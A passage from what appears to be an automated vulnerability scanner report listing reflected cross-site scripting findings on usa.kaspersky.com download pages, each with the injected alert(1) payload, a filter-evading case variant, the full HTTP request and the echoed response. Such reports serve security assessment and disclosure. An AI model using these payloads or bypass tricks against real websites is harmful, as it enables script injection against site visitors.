The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d92f2"-alert(1)-"a31fc07e2de was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /downloadsd92f2"-alert(1)-"a31fc07e2de/free-30-day-trials HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:30:10 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686210"
Content-Type: text/html; charset=utf-8
Content-Length: 30120
Date: Sat, 18 Dec 2010 15:30:17 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloadsd92f2"-alert(1)-"a31fc07e2de/free-30-day-trials";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.39. http://usa.kaspersky.com/downloads/free-30-day-trials [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/free-30-day-trials

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 196e2"><script>alert(1)</script>dbfe65be56b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads196e2"><script>alert(1)</script>dbfe65be56b/free-30-day-trials HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:29:51 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686191"
Content-Type: text/html; charset=utf-8
Content-Length: 30217
Date: Sat, 18 Dec 2010 15:29:55 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads196e2"><script>alert(1)</script>dbfe65be56b/free-30-day-trials" />
...[SNIP]...

1.40. http://usa.kaspersky.com/downloads/free-30-day-trials [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/free-30-day-trials

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b0c6"-alert(1)-"83b6ac6b080 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /downloads/free-30-day-trials7b0c6"-alert(1)-"83b6ac6b080 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:32:23 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686343"
Content-Type: text/html; charset=utf-8
Content-Length: 30246
Date: Sat, 18 Dec 2010 15:32:28 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
ank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloads/free-30-day-trials7b0c6"-alert(1)-"83b6ac6b080";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.41. http://usa.kaspersky.com/downloads/free-30-day-trials [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/free-30-day-trials

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4632d"><script>alert(1)</script>68a0946f39b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/free-30-day-trials4632d"><script>alert(1)</script>68a0946f39b HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:32:05 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686325"
Content-Type: text/html; charset=utf-8
Content-Length: 30343
Date: Sat, 18 Dec 2010 15:32:12 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads/free-30-day-trials4632d"><script>alert(1)</script>68a0946f39b" />
...[SNIP]...

1.42. http://usa.kaspersky.com/downloads/free-anti-virus-scan [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/free-anti-virus-scan

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b82ae"-alert(1)-"cb315ac2b8a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /downloadsb82ae"-alert(1)-"cb315ac2b8a/free-anti-virus-scan HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_cc=true; gpv_pageName=Homepage; s_nr=1292684728722-Repeat; s_sq=%5B%5BB%5D%5D; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.1.10.1292684729

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:19:08 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685548"
Content-Type: text/html; charset=utf-8
Content-Length: 32005
Date: Sat, 18 Dec 2010 15:19:14 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloadsb82ae"-alert(1)-"cb315ac2b8a/free-anti-virus-scan";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.43. http://usa.kaspersky.com/downloads/free-anti-virus-scan [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/free-anti-virus-scan

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3d4e"><ScRiPt>alert(1)</ScRiPt>7db69a126e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /downloadsa3d4e"><ScRiPt>alert(1)</ScRiPt>7db69a126e3/free-anti-virus-scan HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_cc=true; gpv_pageName=Homepage; s_nr=1292684728722-Repeat; s_sq=%5B%5BB%5D%5D; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.1.10.1292684729

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:18:51 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685531"
Content-Type: text/html; charset=utf-8
Content-Length: 30228
Date: Sat, 18 Dec 2010 15:18:57 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloadsa3d4e"><ScRiPt>alert(1)</ScRiPt>7db69a126e3/free-anti-virus-scan" />
...[SNIP]...

1.44. http://usa.kaspersky.com/downloads/free-anti-virus-scan [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/free-anti-virus-scan

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fdb3</script><script>alert(1)</script>7f82c92cfb0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /downloads/free-anti-virus-scan5fdb3</script><script>alert(1)</script>7f82c92cfb0 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_cc=true; gpv_pageName=Homepage; s_nr=1292684728722-Repeat; s_sq=%5B%5BB%5D%5D; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.1.10.1292684729

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:22:36 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685756"
Content-Type: text/html; charset=utf-8
Content-Length: 30394
Date: Sat, 18 Dec 2010 15:22:41 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
k You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloads/free-anti-virus-scan5fdb3</script><script>alert(1)</script>7f82c92cfb0";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.45. http://usa.kaspersky.com/downloads/free-anti-virus-scan [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/free-anti-virus-scan

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5645b"><script>alert(1)</script>a1fd0698d94 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/free-anti-virus-scan5645b"><script>alert(1)</script>a1fd0698d94 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_cc=true; gpv_pageName=Homepage; s_nr=1292684728722-Repeat; s_sq=%5B%5BB%5D%5D; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.1.10.1292684729

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:21:37 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685697"
Content-Type: text/html; charset=utf-8
Content-Length: 30355
Date: Sat, 18 Dec 2010 15:21:45 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads/free-anti-virus-scan5645b"><script>alert(1)</script>a1fd0698d94" />
...[SNIP]...

1.46. http://usa.kaspersky.com/downloads/free-anti-virus-scan [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/free-anti-virus-scan

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5814d"><script>alert(1)</script>c5ab10e00af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/free-anti-virus-scan?5814d"><script>alert(1)</script>c5ab10e00af=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_cc=true; gpv_pageName=Homepage; s_nr=1292684728722-Repeat; s_sq=%5B%5BB%5D%5D; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.1.10.1292684729

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:16:08 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685368"
Content-Type: text/html; charset=utf-8
Content-Length: 35651
Date: Sat, 18 Dec 2010 15:16:17 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads/free-anti-virus-scan?5814d"><script>alert(1)</script>c5ab10e00af=1" />
...[SNIP]...

1.47. http://usa.kaspersky.com/downloads/free-home-trials/index.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/free-home-trials/index.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8526"-alert(1)-"5e933fa9306 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /downloads/free-home-trials/index.htmla8526"-alert(1)-"5e933fa9306 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:14:20 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685260"
Content-Type: text/html; charset=utf-8
Content-Length: 31583
Date: Sat, 18 Dec 2010 15:14:27 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
}
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloads/free-home-trials/index.htmla8526"-alert(1)-"5e933fa9306";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.48. http://usa.kaspersky.com/downloads/free-home-trials/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/free-home-trials/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9433"-alert(1)-"c93d6cf804b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /downloads/free-home-trials/index.html?f9433"-alert(1)-"c93d6cf804b=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:09:39 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292684979"
Content-Type: text/html; charset=utf-8
Content-Length: 38793
Date: Sat, 18 Dec 2010 15:09:46 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
}
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloads/free-home-trials/index.html?f9433"-alert(1)-"c93d6cf804b=1";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.49. http://usa.kaspersky.com/downloads/free-home-trials/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/free-home-trials/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a14ad"><script>alert(1)</script>b7abe58652d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/free-home-trials/index.html?a14ad"><script>alert(1)</script>b7abe58652d=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:09:04 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292684944"
Content-Type: text/html; charset=utf-8
Content-Length: 38947
Date: Sat, 18 Dec 2010 15:09:13 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads/free-home-trials/index.html?a14ad"><script>alert(1)</script>b7abe58652d=1" />
...[SNIP]...

1.50. http://usa.kaspersky.com/downloads/free-home-trials/internet-security [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/free-home-trials/internet-security

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53f67"><script>alert(1)</script>e5525a7df97 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads53f67"><script>alert(1)</script>e5525a7df97/free-home-trials/internet-security HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/downloads
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
